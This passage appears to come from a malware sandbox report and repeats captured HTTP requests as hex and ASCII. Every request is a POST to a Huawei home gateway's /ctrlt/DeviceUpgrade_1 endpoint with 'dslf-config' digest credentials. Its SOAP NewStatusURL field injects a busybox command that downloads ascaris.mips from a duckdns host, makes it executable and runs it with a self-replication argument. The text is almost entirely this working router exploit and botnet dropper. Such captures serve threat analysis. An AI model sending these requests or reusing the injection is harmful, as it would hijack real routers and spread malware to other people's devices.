73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 3b 2f 74 6d 70 2f 61 73 63 61 72 69 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g amkbins.duckdns.org -l /tmp/ascaris -r /bins/ascaris.mips;chmod 777 /tmp/ascaris;/tmp/ascaris huawei.selfrep;rm -rf /tmp/ascaris)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
